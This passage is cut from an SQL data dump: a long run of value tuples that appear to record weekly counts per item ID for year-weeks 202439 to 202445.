9',3),(1741,1,'202439',3),(1751,1,'202439',3),(2150,1,'202439',3),(2156,1,'202439',3),(2296,1,'202439',3),(2775,1,'202439',3),(2809,1,'202439',3),(2904,1,'202439',3),(2991,1,'202439',3),(3006,1,'202439',3),(3030,1,'202439',3),(3092,1,'202439',3),(3251,1,'202439',3),(3259,1,'202439',3),(3265,1,'202439',3),(3267,1,'202439',3),(3269,1,'202439',3),(3282,1,'202439',3),(4373,1,'202439',3),(4412,1,'202439',3),(4444,1,'202439',3),(4546,1,'202439',3),(4566,1,'202439',3),(4612,1,'202439',3),(4792,1,'202439',3),(4797,1,'202439',3),(4858,1,'202439',3),(4888,1,'202439',3),(4897,1,'202439',3),(5028,1,'202439',3),(5050,1,'202439',3),(5058,1,'202439',3),(5062,1,'202439',3),(5248,1,'202439',3),(5259,1,'202439',3),(72,1,'202439',4),(469,1,'202439',4),(1586,1,'202439',4),(1614,1,'202439',4),(1705,1,'202439',4),(1720,1,'202439',4),(1722,1,'202439',4),(1728,1,'202439',4),(1732,1,'202439',4),(1737,1,'202439',4),(1768,1,'202439',4),(1772,1,'202439',4),(1776,1,'202439',4),(1778,1,'202439',4),(2178,1,'202439',4),(2293,1,'202439',4),(2558,1,'202439',4),(2769,1,'202439',4),(2993,1,'202439',4),(3109,1,'202439',4),(3229,1,'202439',4),(3240,1,'202439',4),(3243,1,'202439',4),(3253,1,'202439',4),(3257,1,'202439',4),(3263,1,'202439',4),(3275,1,'202439',4),(3285,1,'202439',4),(3287,1,'202439',4),(4382,1,'202439',4),(4396,1,'202439',4),(4408,1,'202439',4),(4424,1,'202439',4),(4428,1,'202439',4),(4436,1,'202439',4),(4440,1,'202439',4),(4448,1,'202439',4),(4587,1,'202439',4),(4591,1,'202439',4),(4776,1,'202439',4),(4862,1,'202439',4),(4866,1,'202439',4),(4870,1,'202439',4),(4878,1,'202439',4),(4883,1,'202439',4),(4893,1,'202439',4),(5024,1,'202439',4),(5046,1,'202439',4),(5054,1,'202439',4),(5071,1,'202439',4),(5080,1,'202439',4),(5140,1,'202439',4),(5146,1,'202439',4),(5153,1,'202439',4),(5157,1,'202439',4),(5326,1,'202439',4),(5374,1,'202439',4),(5383,1,'202439',4),(570,1,'202439',5),(1598,1,'202439',5),(1715,1,'202439',5),(1726,1,'202439',5),(1739,1,'202439',5),(1782,1,'202439',5),(2063,1,'202439',5),(2159,1,'202439',5),(2252,1,'202439',5),(2801,1,'202439',5),(2989,1,'202439',5),(3005,1,'202439',5),(3249,1,'202439',5),(3261,1,'202439',5),(3271,1,'202439',5),(3273,1,'202439',5),(3278,1,'202439',5),(3280,1,'202439',5),(4363,1,'202439',5),(4368,1,'202439',5),(4377,1,'202439',5),(4404,1,'202439',5),(4416,1,'202439',5),(4529,1,'202439',5),(4759,1,'202439',5),(5037,1,'202439',5),(5042,1,'202439',5),(5330,1,'202439',5),(5363,1,'202439',5),(5378,1,'202439',5),(470,1,'202439',6),(473,1,'202439',6),(1544,1,'202439',6),(1707,1,'202439',6),(1709,1,'202439',6),(1724,1,'202439',6),(1747,1,'202439',6),(1770,1,'202439',6),(2154,1,'202439',6),(2248,1,'202439',6),(2457,1,'202439',6),(2965,1,'202439',6),(3087,1,'202439',6),(3107,1,'202439',6),(3479,1,'202439',6),(3541,1,'202439',6),(4357,1,'202439',6),(4387,1,'202439',6),(4432,1,'202439',6),(4556,1,'202439',6),(4802,1,'202439',6),(5020,1,'202439',6),(5067,1,'202439',6),(5131,1,'202439',6),(5264,1,'202439',6),(1745,1,'202439',7),(2152,1,'202439',7),(2658,1,'202439',7),(3079,1,'202439',7),(3226,1,'202439',7),(4542,1,'202439',7),(4874,1,'202439',7),(468,1,'202439',8),(471,1,'202439',8),(474,1,'202439',8),(1602,1,'202439',8),(2297,1,'202439',8),(2309,1,'202439',8),(4326,1,'202439',8),(4391,1,'202439',8),(76,1,'202439',9),(467,1,'202439',9),(1703,1,'202439',9),(1711,1,'202439',9),(2165,1,'202439',9),(2609,1,'202439',9),(3104,1,'202439',9),(3247,1,'202439',9),(1749,1,'202439',10),(1766,1,'202439',10),(1718,1,'202439',11),(2161,1,'202439',11),(2617,1,'202439',11),(3781,1,'202439',11),(4420,1,'202439',11),(1780,1,'202439',12),(3096,1,'202439',12),(3102,1,'202439',12),(1774,1,'202439',13),(1743,1,'202439',14),(2148,1,'202439',14),(2751,1,'202439',15),(3245,1,'202439',18),(68,1,'202439',37),(80,1,'202439',37),(9,1,'202439',54958),(87,1,'202440',1),(91,1,'202440',1),(102,1,'202440',1),(108,1,'202440',1),(472,1,'202440',1),(479,1,'202440',1),(483,1,'202440',1),(1596,1,'202440',1),(1600,1,'202440',1),(1606,1,'202440',1),(1614,1,'202440',1),(1697,1,'202440',1),(1705,1,'202440',1),(1713,1,'202440',1),(1720,1,'202440',1),(1734,1,'202440',1),(1739,1,'202440',1),(1741,1,'202440',1),(1745,1,'202440',1),(1747,1,'202440',1),(1751,1,'202440',1),(1768,1,'202440',1),(1778,1,'202440',1),(2150,1,'202440',1),(2156,1,'202440',1),(2178,1,'202440',1),(2809,1,'202440',1),(2813,1,'202440',1),(2911,1,'202440',1),(2989,1,'202440',1),(3006,1,'202440',1),(3023,1,'202440',1),(3097,1,'202440',1),(3107,1,'202440',1),(3229,1,'202440',1),(3240,1,'202440',1),(3245,1,'202440',1),(3249,1,'202440',1),(3251,1,'202440',1),(3257,1,'202440',1),(3259,1,'202440',1),(3263,1,'202440',1),(3265,1,'202440',1),(3269,1,'202440',1),(3275,1,'202440',1),(3278,1,'202440',1),(3280,1,'202440',1),(3285,1,'202440',1),(3438,1,'202440',1),(3498,1,'202440',1),(3531,1,'202440',1),(3534,1,'202440',1),(3710,1,'202440',1),(4301,1,'202440',1),(4326,1,'202440',1),(4332,1,'202440',1),(4338,1,'202440',1),(4357,1,'202440',1),(4373,1,'202440',1),(4377,1,'202440',1),(4382,1,'202440',1),(4387,1,'202440',1),(4396,1,'202440',1),(4408,1,'202440',1),(4424,1,'202440',1),(4428,1,'202440',1),(4436,1,'202440',1),(4440,1,'202440',1),(4444,1,'202440',1),(4457,1,'202440',1),(4529,1,'202440',1),(4546,1,'202440',1),(4556,1,'202440',1),(4591,1,'202440',1),(4691,1,'202440',1),(4768,1,'202440',1),(4771,1,'202440',1),(4792,1,'202440',1),(4797,1,'202440',1),(4802,1,'202440',1),(4874,1,'202440',1),(4878,1,'202440',1),(4888,1,'202440',1),(4893,1,'202440',1),(4897,1,'202440',1),(4976,1,'202440',1),(4977,1,'202440',1),(5020,1,'202440',1),(5033,1,'202440',1),(5037,1,'202440',1),(5042,1,'202440',1),(5046,1,'202440',1),(5050,1,'202440',1),(5058,1,'202440',1),(5071,1,'202440',1),(5080,1,'202440',1),(5128,1,'202440',1),(5140,1,'202440',1),(5259,1,'202440',1),(5264,1,'202440',1),(5268,1,'202440',1),(5320,1,'202440',1),(5330,1,'202440',1),(5363,1,'202440',1),(5383,1,'202440',1),(72,1,'202440',2),(484,1,'202440',2),(486,1,'202440',2),(487,1,'202440',2),(1592,1,'202440',2),(1604,1,'202440',2),(1699,1,'202440',2),(1703,1,'202440',2),(1722,1,'202440',2),(1728,1,'202440',2),(1737,1,'202440',2),(1770,1,'202440',2),(1772,1,'202440',2),(2165,1,'202440',2),(2296,1,'202440',2),(2704,1,'202440',2),(2748,1,'202440',2),(3027,1,'202440',2),(3034,1,'202440',2),(3038,1,'202440',2),(3060,1,'202440',2),(3066,1,'202440',2),(3069,1,'202440',2),(3079,1,'202440',2),(3109,1,'202440',2),(3253,1,'202440',2),(3267,1,'202440',2),(3282,1,'202440',2),(3287,1,'202440',2),(3290,1,'202440',2),(3479,1,'202440',2),(3482,1,'202440',2),(3541,1,'202440',2),(4329,1,'202440',2),(4420,1,'202440',2),(4454,1,'202440',2),(4587,1,'202440',2),(4612,1,'202440',2),(4741,1,'202440',2),(4776,1,'202440',2),(4858,1,'202440',2),(4866,1,'202440',2),(4883,1,'202440',2),(4996,1,'202440',2),(5028,1,'202440',2),(5062,1,'202440',2),(5101,1,'202440',2),(5134,1,'202440',2),(5157,1,'202440',2),(5248,1,'202440',2),(5301,1,'202440',2),(5314,1,'202440',2),(5374,1,'202440',2),(5378,1,'202440',2),(89,1,'202440',3),(477,1,'202440',3),(478,1,'202440',3),(480,1,'202440',3),(482,1,'202440',3),(1544,1,'202440',3),(1586,1,'202440',3),(1594,1,'202440',3),(1608,1,'202440',3),(1695,1,'202440',3),(1701,1,'202440',3),(1707,1,'202440',3),(1709,1,'202440',3),(1718,1,'202440',3),(1732,1,'202440',3),(1782,1,'202440',3),(2063,1,'202440',3),(2309,1,'202440',3),(2558,1,'202440',3),(2609,1,'202440',3),(2991,1,'202440',3),(2993,1,'202440',3),(3030,1,'202440',3),(3271,1,'202440',3),(3273,1,'202440',3),(4323,1,'202440',3),(4432,1,'202440',3),(4448,1,'202440',3),(4566,1,'202440',3),(5054,1,'202440',3),(5153,1,'202440',3),(5326,1,'202440',3),(481,1,'202440',4),(1602,1,'202440',4),(1724,1,'202440',4),(1726,1,'202440',4),(1730,1,'202440',4),(1766,1,'202440',4),(1774,1,'202440',4),(1776,1,'202440',4),(1780,1,'202440',4),(2154,1,'202440',4),(2159,1,'202440',4),(2252,1,'202440',4),(2293,1,'202440',4),(2457,1,'202440',4),(3102,1,'202440',4),(3261,1,'202440',4),(4238,1,'202440',4),(4363,1,'202440',4),(4368,1,'202440',4),(4391,1,'202440',4),(4404,1,'202440',4),(4542,1,'202440',4),(5076,1,'202440',4),(2297,1,'202440',5),(2503,1,'202440',5),(2904,1,'202440',5),(3087,1,'202440',5),(5067,1,'202440',5),(5146,1,'202440',5),(76,1,'202440',6),(471,1,'202440',6),(1749,1,'202440',6),(2152,1,'202440',6),(2617,1,'202440',6),(2658,1,'202440',6),(2775,1,'202440',6),(3104,1,'202440',6),(3226,1,'202440',6),(3247,1,'202440',6),(3307,1,'202440',6),(4759,1,'202440',6),(5125,1,'202440',6),(468,1,'202440',7),(570,1,'202440',7),(1743,1,'202440',7),(2161,1,'202440',7),(2248,1,'202440',7),(2801,1,'202440',7),(3092,1,'202440',7),(4412,1,'202440',7),(470,1,'202440',8),(1711,1,'202440',8),(4416,1,'202440',8),(4722,1,'202440',8),(467,1,'202440',9),(474,1,'202440',9),(1582,1,'202440',9),(2751,1,'202440',9),(3005,1,'202440',9),(469,1,'202440',10),(3096,1,'202440',10),(3781,1,'202440',11),(473,1,'202440',12),(2148,1,'202440',14),(68,1,'202440',46),(80,1,'202440',55),(9,1,'202440',20242),(74,1,'202441',1),(84,1,'202441',1),(89,1,'202441',1),(102,1,'202441',1),(467,1,'202441',1),(469,1,'202441',1),(470,1,'202441',1),(478,1,'202441',1),(484,1,'202441',1),(485,1,'202441',1),(486,1,'202441',1),(1602,1,'202441',1),(1608,1,'202441',1),(1707,1,'202441',1),(1709,1,'202441',1),(1724,1,'202441',1),(1741,1,'202441',1),(1776,1,'202441',1),(1778,1,'202441',1),(1780,1,'202441',1),(1782,1,'202441',1),(2150,1,'202441',1),(2159,1,'202441',1),(2178,1,'202441',1),(2252,1,'202441',1),(2309,1,'202441',1),(2658,1,'202441',1),(2704,1,'202441',1),(2769,1,'202441',1),(2813,1,'202441',1),(2911,1,'202441',1),(2964,1,'202441',1),(2965,1,'202441',1),(3004,1,'202441',1),(3005,1,'202441',1),(3038,1,'202441',1),(3069,1,'202441',1),(3087,1,'202441',1),(3097,1,'202441',1),(3104,1,'202441',1),(3107,1,'202441',1),(3240,1,'202441',1),(3243,1,'202441',1),(3251,1,'202441',1),(3253,1,'202441',1),(3259,1,'202441',1),(3263,1,'202441',1),(3265,1,'202441',1),(3275,1,'202441',1),(3278,1,'202441',1),(3280,1,'202441',1),(3486,1,'202441',1),(3749,1,'202441',1),(3771,1,'202441',1),(4357,1,'202441',1),(4391,1,'202441',1),(4396,1,'202441',1),(4420,1,'202441',1),(4424,1,'202441',1),(4542,1,'202441',1),(4546,1,'202441',1),(4591,1,'202441',1),(4608,1,'202441',1),(4712,1,'202441',1),(4762,1,'202441',1),(4802,1,'202441',1),(4870,1,'202441',1),(4878,1,'202441',1),(4883,1,'202441',1),(4897,1,'202441',1),(4996,1,'202441',1),(5024,1,'202441',1),(5058,1,'202441',1),(5062,1,'202441',1),(5122,1,'202441',1),(5125,1,'202441',1),(5157,1,'202441',1),(5163,1,'202441',1),(5280,1,'202441',1),(5298,1,'202441',1),(5307,1,'202441',1),(5310,1,'202441',1),(5383,1,'202441',1),(335,1,'202441',2),(474,1,'202441',2),(1582,1,'202441',2),(1610,1,'202441',2),(1699,1,'202441',2),(1701,1,'202441',2),(1718,1,'202441',2),(1726,1,'202441',2),(1734,1,'202441',2),(1743,1,'202441',2),(1745,1,'202441',2),(1766,1,'202441',2),(2154,1,'202441',2),(2248,1,'202441',2),(2296,1,'202441',2),(2457,1,'202441',2),(2558,1,'202441',2),(2609,1,'202441',2),(2775,1,'202441',2),(2904,1,'202441',2),(3041,1,'202441',2),(3063,1,'202441',2),(3092,1,'202441',2),(3102,1,'202441',2),(3117,1,'202441',2),(3124,1,'202441',2),(3267,1,'202441',2),(3285,1,'202441',2),(3287,1,'202441',2),(3313,1,'202441',2),(3438,1,'202441',2),(3489,1,'202441',2),(3531,1,'202441',2),(4335,1,'202441',2),(4363,1,'202441',2),(4412,1,'202441',2),(4432,1,'202441',2),(4454,1,'202441',2),(4524,1,'202441',2),(4529,1,'202441',2),(4551,1,'202441',2),(4587,1,'202441',2),(4677,1,'202441',2),(4697,1,'202441',2),(4765,1,'202441',2),(4776,1,'202441',2),(4930,1,'202441',2),(5042,1,'202441',2),(5046,1,'202441',2),(5248,1,'202441',2),(468,1,'202441',3),(477,1,'202441',3),(481,1,'202441',3),(488,1,'202441',3),(1598,1,'202441',3),(1703,1,'202441',3),(1711,1,'202441',3),(1720,1,'202441',3),(1737,1,'202441',3),(1770,1,'202441',3),(2152,1,'202441',3),(2161,1,'202441',3),(2297,1,'202441',3),(2956,1,'202441',3),(3023,1,'202441',3),(3096,1,'202441',3),(3229,1,'202441',3),(3245,1,'202441',3),(3261,1,'202441',3),(3271,1,'202441',3),(3290,1,'202441',3),(3479,1,'202441',3),(3738,1,'202441',3),(5076,1,'202441',3),(5301,1,'202441',3),(5363,1,'202441',3),(76,1,'202441',4),(480,1,'202441',4),(482,1,'202441',4),(1544,1,'202441',4),(1600,1,'202441',4),(1722,1,'202441',4),(1730,1,'202441',4),(1749,1,'202441',4),(1772,1,'202441',4),(2165,1,'202441',4),(2751,1,'202441',4),(3226,1,'202441',4),(4457,1,'202441',4),(4517,1,'202441',4),(4759,1,'202441',4),(471,1,'202441',5),(1586,1,'202441',5),(1774,1,'202441',5),(2617,1,'202441',5),(2801,1,'202441',5),(1614,1,'202441',6),(4400,1,'202441',6),(3079,1,'202441',8),(1713,1,'202441',9),(3781,1,'202441',9),(2148,1,'202441',12),(5146,1,'202441',20),(3247,1,'202441',21),(68,1,'202441',37),(80,1,'202441',40),(9,1,'202441',17843),(76,1,'202442',1),(84,1,'202442',1),(91,1,'202442',1),(106,1,'202442',1),(468,1,'202442',1),(471,1,'202442',1),(481,1,'202442',1),(482,1,'202442',1),(486,1,'202442',1),(570,1,'202442',1),(1586,1,'202442',1),(1594,1,'202442',1),(1600,1,'202442',1),(1604,1,'202442',1),(1608,1,'202442',1),(1701,1,'202442',1),(1724,1,'202442',1),(1743,1,'202442',1),(1747,1,'202442',1),(1751,1,'202442',1),(2154,1,'202442',1),(2293,1,'202442',1),(2296,1,'202442',1),(2658,1,'202442',1),(2704,1,'202442',1),(2989,1,'202442',1),(2993,1,'202442',1),(3005,1,'202442',1),(3027,1,'202442',1),(3034,1,'202442',1),(3066,1,'202442',1),(3092,1,'202442',1),(3226,1,'202442',1),(3249,1,'202442',1),(3271,1,'202442',1),(3287,1,'202442',1),(3498,1,'202442',1),(3721,1,'202442',1),(3735,1,'202442',1),(4338,1,'202442',1),(4368,1,'202442',1),(4424,1,'202442',1),(4428,1,'202442',1),(4529,1,'202442',1),(4645,1,'202442',1),(4651,1,'202442',1),(4657,1,'202442',1),(4663,1,'202442',1),(4668,1,'202442',1),(4685,1,'202442',1),(4691,1,'202442',1),(4700,1,'202442',1),(4703,1,'202442',1),(4712,1,'202442',1),(4756,1,'202442',1),(4762,1,'202442',1),(4765,1,'202442',1),(4797,1,'202442',1),(4930,1,'202442',1),(5037,1,'202442',1),(5054,1,'202442',1),(5101,1,'202442',1),(5125,1,'202442',1),(5153,1,'202442',1),(5248,1,'202442',1),(5292,1,'202442',1),(5304,1,'202442',1),(5307,1,'202442',1),(5330,1,'202442',1),(5334,1,'202442',1),(5359,1,'202442',1),(89,1,'202442',2),(110,1,'202442',2),(467,1,'202442',2),(470,1,'202442',2),(483,1,'202442',2),(484,1,'202442',2),(487,1,'202442',2),(1606,1,'202442',2),(1703,1,'202442',2),(1705,1,'202442',2),(1718,1,'202442',2),(1772,1,'202442',2),(2063,1,'202442',2),(2309,1,'202442',2),(2503,1,'202442',2),(2751,1,'202442',2),(3038,1,'202442',2),(3063,1,'202442',2),(3069,1,'202442',2),(3072,1,'202442',2),(3079,1,'202442',2),(3083,1,'202442',2),(3090,1,'202442',2),(3107,1,'202442',2),(3117,1,'202442',2),(3245,1,'202442',2),(3259,1,'202442',2),(3265,1,'202442',2),(3278,1,'202442',2),(3482,1,'202442',2),(3724,1,'202442',2),(3731,1,'202442',2),(3746,1,'202442',2),(3764,1,'202442',2),(4238,1,'202442',2),(4323,1,'202442',2),(4329,1,'202442',2),(4332,1,'202442',2),(4357,1,'202442',2),(4396,1,'202442',2),(4416,1,'202442',2),(4566,1,'202442',2),(4677,1,'202442',2),(4750,1,'202442',2),(4874,1,'202442',2),(4976,1,'202442',2),(5067,1,'202442',2),(5137,1,'202442',2),(5259,1,'202442',2),(5268,1,'202442',2),(5301,1,'202442',2),(5310,1,'202442',2),(5314,1,'202442',2),(5320,1,'202442',2),(72,1,'202442',3),(472,1,'202442',3),(474,1,'202442',3),(479,1,'202442',3),(1598,1,'202442',3),(1728,1,'202442',3),(2161,1,'202442',3),(2457,1,'202442',3),(2904,1,'202442',3),(3006,1,'202442',3),(3030,1,'202442',3),(3253,1,'202442',3),(3261,1,'202442',3),(4363,1,'202442',3),(4432,1,'202442',3),(5076,1,'202442',3),(1582,1,'202442',4),(1726,1,'202442',4),(1734,1,'202442',4),(1770,1,'202442',4),(2165,1,'202442',4),(2297,1,'202442',4),(3004,1,'202442',4),(3087,1,'202442',4),(3781,1,'202442',4),(4514,1,'202442',4),(4759,1,'202442',4),(4883,1,'202442',4),(1592,1,'202442',5),(1602,1,'202442',5),(3714,1,'202442',5),(4377,1,'202442',5),(4776,1,'202442',5),(5028,1,'202442',5),(5326,1,'202442',5),(1544,1,'202442',6),(1695,1,'202442',6),(2801,1,'202442',6),(4412,1,'202442',6),(3060,1,'202442',7),(4420,1,'202442',10),(4457,1,'202442',10),(2148,1,'202442',12),(3247,1,'202442',18),(68,1,'202442',41),(80,1,'202442',43),(9,1,'202442',18785),(84,1,'202443',1),(102,1,'202443',1),(335,1,'202443',1),(474,1,'202443',1),(479,1,'202443',1),(485,1,'202443',1),(488,1,'202443',1),(1604,1,'202443',1),(1610,1,'202443',1),(1614,1,'202443',1),(1720,1,'202443',1),(1734,1,'202443',1),(1737,1,'202443',1),(1739,1,'202443',1),(1774,1,'202443',1),(2159,1,'202443',1),(2161,1,'202443',1),(2457,1,'202443',1),(2804,1,'202443',1),(2904,1,'202443',1),(2964,1,'202443',1),(3004,1,'202443',1),(3023,1,'202443',1),(3041,1,'202443',1),(3063,1,'202443',1),(3066,1,'202443',1),(3107,1,'202443',1),(3124,1,'202443',1),(3226,1,'202443',1),(3245,1,'202443',1),(3251,1,'202443',1),(3273,1,'202443',1),(3290,1,'202443',1),(3313,1,'202443',1),(3479,1,'202443',1),(3710,1,'202443',1),(3777,1,'202443',1),(4301,1,'202443',1),(4329,1,'202443',1),(4363,1,'202443',1),(4391,1,'202443',1),(4400,1,'202443',1),(4408,1,'202443',1),(4416,1,'202443',1),(4428,1,'202443',1),(4436,1,'202443',1),(4448,1,'202443',1),(4457,1,'202443',1),(4529,1,'202443',1),(4608,1,'202443',1),(4645,1,'202443',1),(4654,1,'202443',1),(4657,1,'202443',1),(4660,1,'202443',1),(4674,1,'202443',1),(4681,1,'202443',1),(4697,1,'202443',1),(4706,1,'202443',1),(4712,1,'202443',1),(4756,1,'202443',1),(4765,1,'202443',1),(4776,1,'202443',1),(4802,1,'202443',1),(4858,1,'202443',1),(4862,1,'202443',1),(4870,1,'202443',1),(4878,1,'202443',1),(4883,1,'202443',1),(4893,1,'202443',1),(4897,1,'202443',1),(4988,1,'202443',1),(5020,1,'202443',1),(5037,1,'202443',1),(5046,1,'202443',1),(5054,1,'202443',1),(5125,1,'202443',1),(5128,1,'202443',1),(5131,1,'202443',1),(5134,1,'202443',1),(5137,1,'202443',1),(5153,1,'202443',1),(5253,1,'202443',1),(5271,1,'202443',1),(5289,1,'202443',1),(5298,1,'202443',1),(5304,1,'202443',1),(5317,1,'202443',1),(5326,1,'202443',1),(5356,1,'202443',1),(467,1,'202443',2),(482,1,'202443',2),(484,1,'202443',2),(487,1,'202443',2),(1582,1,'202443',2),(1586,1,'202443',2),(1592,1,'202443',2),(1600,1,'202443',2),(1695,1,'202443',2),(1703,1,'202443',2),(1709,1,'202443',2),(1711,1,'202443',2),(1715,1,'202443',2),(1718,1,'202443',2),(1722,1,'202443',2),(1728,1,'202443',2),(1741,1,'202443',2),(1751,1,'202443',2),(1776,1,'202443',2),(2150,1,'202443',2),(2297,1,'202443',2),(2748,1,'202443',2),(2801,1,'202443',2),(2993,1,'202443',2),(3027,1,'202443',2),(3069,1,'202443',2),(3117,1,'202443',2),(3257,1,'202443',2),(3275,1,'202443',2),(3278,1,'202443',2),(3280,1,'202443',2),(3482,1,'202443',2),(3486,1,'202443',2),(3534,1,'202443',2),(3541,1,'202443',2),(3714,1,'202443',2),(3752,1,'202443',2),(4238,1,'202443',2),(4323,1,'202443',2),(4444,1,'202443',2),(4524,1,'202443',2),(4556,1,'202443',2),(4612,1,'202443',2),(4648,1,'202443',2),(4651,1,'202443',2),(4762,1,'202443',2),(4792,1,'202443',2),(4980,1,'202443',2),(5058,1,'202443',2),(5067,1,'202443',2),(5076,1,'202443',2),(5146,1,'202443',2),(5248,1,'202443',2),(5295,1,'202443',2),(5383,1,'202443',2),(72,1,'202443',3),(89,1,'202443',3),(468,1,'202443',3),(473,1,'202443',3),(477,1,'202443',3),(480,1,'202443',3),(570,1,'202443',3),(1588,1,'202443',3),(1596,1,'202443',3),(1602,1,'202443',3),(2248,1,'202443',3),(2252,1,'202443',3),(2293,1,'202443',3),(2609,1,'202443',3),(3006,1,'202443',3),(3072,1,'202443',3),(3087,1,'202443',3),(3104,1,'202443',3),(3240,1,'202443',3),(3285,1,'202443',3),(3489,1,'202443',3),(3738,1,'202443',3),(3781,1,'202443',3),(4432,1,'202443',3),(4520,1,'202443',3),(4582,1,'202443',3),(4753,1,'202443',3),(4996,1,'202443',3),(5259,1,'202443',3),(5314,1,'202443',3),(483,1,'202443',4),(1584,1,'202443',4),(2154,1,'202443',4),(2558,1,'202443',4),(3092,1,'202443',4),(3261,1,'202443',4),(4420,1,'202443',4),(4542,1,'202443',4),(4566,1,'202443',4),(4759,1,'202443',4),(1598,1,'202443',5),(1724,1,'202443',5),(1780,1,'202443',5),(2775,1,'202443',5),(3005,1,'202443',5),(3253,1,'202443',5),(3498,1,'202443',5),(1772,1,'202443',6),(3034,1,'202443',6),(4694,1,'202443',6),(4722,1,'202443',6),(76,1,'202443',7),(1699,1,'202443',7),(2165,1,'202443',7),(2658,1,'202443',7),(3079,1,'202443',7),(3263,1,'202443',7),(4275,1,'202443',7),(4341,1,'202443',7),(1743,1,'202443',8),(3097,1,'202443',8),(3229,1,'202443',8),(3764,1,'202443',8),(1544,1,'202443',9),(1745,1,'202443',9),(2751,1,'202443',9),(1732,1,'202443',10),(1749,1,'202443',11),(2148,1,'202443',12),(3060,1,'202443',21),(3247,1,'202443',30),(68,1,'202443',32),(80,1,'202443',68),(9,1,'202443',22669),(84,1,'202444',1),(467,1,'202444',1),(471,1,'202444',1),(473,1,'202444',1),(474,1,'202444',1),(476,1,'202444',1),(478,1,'202444',1),(479,1,'202444',1),(482,1,'202444',1),(483,1,'202444',1),(485,1,'202444',1),(486,1,'202444',1),(487,1,'202444',1),(1544,1,'202444',1),(1588,1,'202444',1),(1598,1,'202444',1),(1600,1,'202444',1),(1695,1,'202444',1),(1703,1,'202444',1),(1718,1,'202444',1),(1747,1,'202444',1),(1768,1,'202444',1),(1770,1,'202444',1),(1778,1,'202444',1),(1782,1,'202444',1),(2154,1,'202444',1),(2457,1,'202444',1),(2704,1,'202444',1),(2769,1,'202444',1),(2956,1,'202444',1),(2993,1,'202444',1),(3038,1,'202444',1),(3041,1,'202444',1),(3045,1,'202444',1),(3109,1,'202444',1),(3117,1,'202444',1),(3127,1,'202444',1),(3253,1,'202444',1),(3265,1,'202444',1),(3290,1,'202444',1),(3307,1,'202444',1),(3316,1,'202444',1),(3731,1,'202444',1),(4329,1,'202444',1),(4357,1,'202444',1),(4363,1,'202444',1),(4382,1,'202444',1),(4400,1,'202444',1),(4416,1,'202444',1),(4428,1,'202444',1),(4436,1,'202444',1),(4454,1,'202444',1),(4582,1,'202444',1),(4608,1,'202444',1),(4651,1,'202444',1),(4681,1,'202444',1),(4685,1,'202444',1),(4697,1,'202444',1),(4709,1,'202444',1),(4722,1,'202444',1),(4741,1,'202444',1),(4750,1,'202444',1),(4776,1,'202444',1),(4792,1,'202444',1),(4858,1,'202444',1),(4866,1,'202444',1),(4888,1,'202444',1),(4976,1,'202444',1),(4980,1,'202444',1),(4996,1,'202444',1),(5020,1,'202444',1),(5033,1,'202444',1),(5122,1,'202444',1),(5125,1,'202444',1),(5264,1,'202444',1),(5298,1,'202444',1),(5353,1,'202444',1),(89,1,'202444',2),(469,1,'202444',2),(470,1,'202444',2),(1590,1,'202444',2),(1594,1,'202444',2),(1596,1,'202444',2),(1604,1,'202444',2),(1606,1,'202444',2),(1608,1,'202444',2),(1610,1,'202444',2),(1709,1,'202444',2),(1722,1,'202444',2),(1726,1,'202444',2),(1730,1,'202444',2),(2178,1,'202444',2),(2252,1,'202444',2),(2309,1,'202444',2),(2558,1,'202444',2),(2748,1,'202444',2),(2989,1,'202444',2),(3005,1,'202444',2),(3243,1,'202444',2),(3271,1,'202444',2),(3297,1,'202444',2),(3479,1,'202444',2),(3746,1,'202444',2),(4420,1,'202444',2),(4645,1,'202444',2),(4753,1,'202444',2),(4977,1,'202444',2),(5076,1,'202444',2),(5137,1,'202444',2),(5140,1,'202444',2),(5280,1,'202444',2),(5292,1,'202444',2),(5307,1,'202444',2),(5330,1,'202444',2),(72,1,'202444',3),(74,1,'202444',3),(472,1,'202444',3),(477,1,'202444',3),(1602,1,'202444',3),(1612,1,'202444',3),(1713,1,'202444',3),(2150,1,'202444',3),(2159,1,'202444',3),(2161,1,'202444',3),(2296,1,'202444',3),(2904,1,'202444',3),(2964,1,'202444',3),(3090,1,'202444',3),(3278,1,'202444',3),(3313,1,'202444',3),(3764,1,'202444',3),(4457,1,'202444',3),(4520,1,'202444',3),(5314,1,'202444',3),(5359,1,'202444',3),(1592,1,'202444',4),(2775,1,'202444',4),(2965,1,'202444',4),(4444,1,'202444',4),(4694,1,'202444',4),(4771,1,'202444',4),(5320,1,'202444',4),(468,1,'202444',5),(484,1,'202444',5),(488,1,'202444',5),(570,1,'202444',5),(1614,1,'202444',5),(2248,1,'202444',5),(2297,1,'202444',5),(4323,1,'202444',5),(4326,1,'202444',5),(4412,1,'202444',5),(4612,1,'202444',5),(4883,1,'202444',5),(5101,1,'202444',5),(5374,1,'202444',5),(1586,1,'202444',6),(2503,1,'202444',6),(3006,1,'202444',6),(3738,1,'202444',6),(4301,1,'202444',6),(5268,1,'202444',6),(1720,1,'202444',7),(1766,1,'202444',7),(3107,1,'202444',7),(3247,1,'202444',7),(1728,1,'202444',8),(3069,1,'202444',8),(4404,1,'202444',8),(4759,1,'202444',9),(1749,1,'202444',10),(2751,1,'202444',10),(4542,1,'202444',10),(1745,1,'202444',11),(2148,1,'202444',11),(1732,1,'202444',12),(1772,1,'202444',12),(2658,1,'202444',12),(3092,1,'202444',12),(3261,1,'202444',12),(3781,1,'202444',12),(1780,1,'202444',13),(3097,1,'202444',14),(1699,1,'202444',15),(1724,1,'202444',15),(3079,1,'202444',15),(1582,1,'202444',16),(3263,1,'202444',16),(1743,1,'202444',18),(68,1,'202444',36),(80,1,'202444',50),(9,1,'202444',11083),(108,1,'202445',1),(469,1,'202445',1),(474,1,'202445',1),(476,1,'202445',1),(480,1,'202445',1),(481,1,'202445',1),(482,1,'202445',1),(484,1,'202445',1),(485,1,'202445',1),(486,1,'202445',1),(1586,1,'202445',1),(1592,1,'202445',1),(1594,1,'202445',1),(1598,1,'202445',1),(1604,1,'202445',1),(1614,1,'202445',1),(1703,1,'202445',1),(1709,1,'202445',1),(1718,1,'202445',1),(1722,1,'202445',1),(1730,1,'202445',1),(1734,1,'202445',1),(1739,1,'202445',1),(1751,1,'202445',1),(1774,1,'202445',1),(1776,1,'202445',1),(1778,1,'202445',1),(1782,1,'202445',1),(2150,1,'202445',1),(2296,1,'202445',1),(2503,1,'202445',1),(2558,1,'202445',1),(2609,1,'202445',1),(2704,1,'202445',1),(2813,1,'202445',1),(3030,1,'202445',1),(3034,1,'202445',1),(3038,1,'202445',1),(3045,1,'202445',1),(3066,1,'202445',1),(3072,1,'202445',1),(3109,1,'202445',1),(3226,1,'2